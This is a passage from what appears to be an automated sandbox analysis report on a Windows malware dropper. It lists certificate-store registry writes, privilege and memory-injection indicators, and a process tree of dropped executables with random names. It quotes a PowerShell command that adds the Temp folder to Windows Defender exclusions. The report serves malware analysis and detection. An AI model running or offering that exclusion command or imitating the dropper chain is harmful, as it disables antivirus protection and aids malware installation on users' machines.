967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeultramediaburner.tmpSun1917b8fb5f09db8.exeTobabawehy.exepid process 888 powershell.exe 888 powershell.exe 5876 WerFault.exe 5876 WerFault.exe 5900 WerFault.exe 5900 WerFault.exe 888 powershell.exe 5764 WerFault.exe 5764 WerFault.exe 5428 WerFault.exe 5428 WerFault.exe 5848 5848 660 660 5980 WerFault.exe 5980 WerFault.exe 4912 WerFault.exe 4912 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 5348 ultramediaburner.tmp 5348 ultramediaburner.tmp 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 1124 Sun1917b8fb5f09db8.exe 5408 Tobabawehy.exe 5408 Tobabawehy.exe 5408 Tobabawehy.exe 5408 Tobabawehy.exe 5408 Tobabawehy.exe 5408 Tobabawehy.exe 5408 Tobabawehy.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3196 -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
QSydSxCGLaGDRZ1oU1LJVgeo.exepid process 5344 QSydSxCGLaGDRZ1oU1LJVgeo.exe 3196 3196 3196 3196 3196 3196 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Sun19262b9e49ad.exeSun191101c1aaa.exesetup_2.exepowershell.exeSun195a1614ec24e6a.exeSun198361825f4.exeWerFault.exePublicDwlBrowser1100.exe2.exe5.exeLivelyScreenRecF18.exeBearVpn 3.exeZe2ro.exedescription pid process Token: SeCreateTokenPrivilege 1168 Sun19262b9e49ad.exe Token: SeAssignPrimaryTokenPrivilege 1168 Sun19262b9e49ad.exe Token: SeLockMemoryPrivilege 1168 Sun19262b9e49ad.exe Token: SeIncreaseQuotaPrivilege 1168 Sun19262b9e49ad.exe Token: SeMachineAccountPrivilege 1168 Sun19262b9e49ad.exe Token: SeTcbPrivilege 1168 Sun19262b9e49ad.exe Token: SeSecurityPrivilege 1168 Sun19262b9e49ad.exe Token: SeTakeOwnershipPrivilege 1168 Sun19262b9e49ad.exe Token: SeLoadDriverPrivilege 1168 Sun19262b9e49ad.exe Token: SeSystemProfilePrivilege 1168 Sun19262b9e49ad.exe Token: SeSystemtimePrivilege 1168 Sun19262b9e49ad.exe Token: SeProfSingleProcessPrivilege 1168 Sun19262b9e49ad.exe Token: SeIncBasePriorityPrivilege 1168 Sun19262b9e49ad.exe Token: SeCreatePagefilePrivilege 1168 Sun19262b9e49ad.exe Token: SeCreatePermanentPrivilege 1168 Sun19262b9e49ad.exe Token: SeBackupPrivilege 1168 Sun19262b9e49ad.exe Token: SeRestorePrivilege 1168 Sun19262b9e49ad.exe Token: SeShutdownPrivilege 1168 Sun19262b9e49ad.exe Token: SeDebugPrivilege 1168 Sun19262b9e49ad.exe Token: SeAuditPrivilege 1168 Sun19262b9e49ad.exe Token: SeSystemEnvironmentPrivilege 1168 Sun19262b9e49ad.exe Token: SeChangeNotifyPrivilege 1168 Sun19262b9e49ad.exe Token: SeRemoteShutdownPrivilege 1168 Sun19262b9e49ad.exe Token: SeUndockPrivilege 1168 Sun19262b9e49ad.exe Token: SeSyncAgentPrivilege 1168 Sun19262b9e49ad.exe Token: SeEnableDelegationPrivilege 1168 Sun19262b9e49ad.exe Token: SeManageVolumePrivilege 1168 Sun19262b9e49ad.exe Token: SeImpersonatePrivilege 1168 Sun19262b9e49ad.exe Token: SeCreateGlobalPrivilege 1168 Sun19262b9e49ad.exe Token: 31 1168 Sun19262b9e49ad.exe Token: 32 1168 Sun19262b9e49ad.exe Token: 33 1168 Sun19262b9e49ad.exe Token: 34 1168 Sun19262b9e49ad.exe Token: 35 1168 Sun19262b9e49ad.exe Token: SeDebugPrivilege 3908 Sun191101c1aaa.exe Token: SeDebugPrivilege 3068 setup_2.exe Token: SeDebugPrivilege 888 powershell.exe Token: SeDebugPrivilege 5052 Sun195a1614ec24e6a.exe Token: SeDebugPrivilege 4188 Sun198361825f4.exe Token: SeRestorePrivilege 5764 WerFault.exe Token: SeBackupPrivilege 5764 WerFault.exe Token: SeBackupPrivilege 5764 WerFault.exe Token: SeDebugPrivilege 5976 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 6084 2.exe Token: SeDebugPrivilege 5316 5.exe Token: SeDebugPrivilege 5524 LivelyScreenRecF18.exe Token: SeDebugPrivilege 4496 BearVpn 3.exe Token: SeDebugPrivilege 5496 Ze2ro.exe Token: SeIncreaseQuotaPrivilege 888 powershell.exe Token: SeSecurityPrivilege 888 powershell.exe Token: SeTakeOwnershipPrivilege 888 powershell.exe Token: SeLoadDriverPrivilege 888 powershell.exe Token: SeSystemProfilePrivilege 888 powershell.exe Token: SeSystemtimePrivilege 888 powershell.exe Token: SeProfSingleProcessPrivilege 888 powershell.exe Token: SeIncBasePriorityPrivilege 888 powershell.exe Token: SeCreatePagefilePrivilege 888 powershell.exe Token: SeBackupPrivilege 888 powershell.exe Token: SeRestorePrivilege 888 powershell.exe Token: SeShutdownPrivilege 888 powershell.exe Token: SeDebugPrivilege 888 powershell.exe Token: SeSystemEnvironmentPrivilege 888 powershell.exe Token: SeRemoteShutdownPrivilege 888 powershell.exe Token: SeUndockPrivilege 888 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
ultramediaburner.tmpinstaller.exemsedge.exepid process 5348 ultramediaburner.tmp 1284 installer.exe 3772 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1416 wrote to memory of 4988 1416 setup_x86_x64_install.exe setup_installer.exe PID 1416 wrote to memory of 4988 1416 setup_x86_x64_install.exe setup_installer.exe PID 1416 wrote to memory of 4988 1416 setup_x86_x64_install.exe setup_installer.exe PID 4988 wrote to memory of 4436 4988 setup_installer.exe setup_install.exe PID 4988 wrote to memory of 4436 4988 setup_installer.exe setup_install.exe PID 4988 wrote to memory of 4436 4988 setup_installer.exe setup_install.exe PID 4436 wrote to memory of 4512 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4512 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4512 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4648 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4648 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4648 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4540 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4540 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4540 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4856 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4856 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4856 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4596 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4596 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4596 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 1380 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 1380 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 1380 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 3796 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 3796 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 3796 4436 setup_install.exe cmd.exe PID 4856 wrote to memory of 5032 4856 cmd.exe Sun193fda712d9f1.exe PID 4856 wrote to memory of 5032 4856 cmd.exe Sun193fda712d9f1.exe PID 4436 wrote to memory of 5060 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 5060 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 5060 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 2236 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 2236 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 2236 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4460 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4460 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 4460 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 3232 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 3232 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 3232 4436 setup_install.exe cmd.exe PID 4512 wrote to memory of 888 4512 cmd.exe powershell.exe PID 4512 wrote to memory of 888 4512 cmd.exe powershell.exe PID 4512 wrote to memory of 888 4512 cmd.exe powershell.exe PID 4648 wrote to memory of 1124 4648 cmd.exe Sun1917b8fb5f09db8.exe PID 4648 wrote to memory of 1124 4648 cmd.exe Sun1917b8fb5f09db8.exe PID 4648 wrote to memory of 1124 4648 cmd.exe Sun1917b8fb5f09db8.exe PID 4436 wrote to memory of 1064 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 1064 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 1064 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 1180 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 1180 4436 setup_install.exe cmd.exe PID 4436 wrote to memory of 1180 4436 setup_install.exe cmd.exe PID 4540 wrote to memory of 1168 4540 cmd.exe Sun19262b9e49ad.exe PID 4540 wrote to memory of 1168 4540 cmd.exe Sun19262b9e49ad.exe PID 4540 wrote to memory of 1168 4540 cmd.exe Sun19262b9e49ad.exe PID 3796 wrote to memory of 3572 3796 cmd.exe Sun19de8ff4b6aefeb8.exe PID 3796 wrote to memory of 3572 3796 cmd.exe Sun19de8ff4b6aefeb8.exe PID 3796 wrote to memory of 3572 3796 cmd.exe Sun19de8ff4b6aefeb8.exe PID 4596 wrote to memory of 3068 4596 cmd.exe setup_2.exe PID 4596 wrote to memory of 3068 4596 cmd.exe setup_2.exe PID 3232 wrote to memory of 4248 3232 cmd.exe Sun1905815e51282417.exe PID 3232 wrote to memory of 4248 3232 cmd.exe Sun1905815e51282417.exe PID 3232 wrote to memory of 4248 3232 cmd.exe Sun1905815e51282417.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\m1dOwok5aPcrur45Ch_l6GVs.exe"C:\Users\Admin\Documents\m1dOwok5aPcrur45Ch_l6GVs.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1956 -s 2447⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\g4sLH6CA5afgxnFDnbN6julV.exe"C:\Users\Admin\Documents\g4sLH6CA5afgxnFDnbN6julV.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\i_mtShrQKXhCFkurByO6l9wD.exe"C:\Users\Admin\Documents\i_mtShrQKXhCFkurByO6l9wD.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\5cyMyMfaTHF5mm4GGWje7aCw.exe"C:\Users\Admin\Documents\5cyMyMfaTHF5mm4GGWje7aCw.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6096 -s 3007⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\jRMIx4HYZwNMhmRfA3bxVT31.exe"C:\Users\Admin\Documents\jRMIx4HYZwNMhmRfA3bxVT31.exe"6⤵
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
-
C:\Users\Admin\Documents\UqeNeCzEYzHh_NzaAB2UgDsH.exe"C:\Users\Admin\Documents\UqeNeCzEYzHh_NzaAB2UgDsH.exe"8⤵
- Suspicious use of SetThreadContext
-
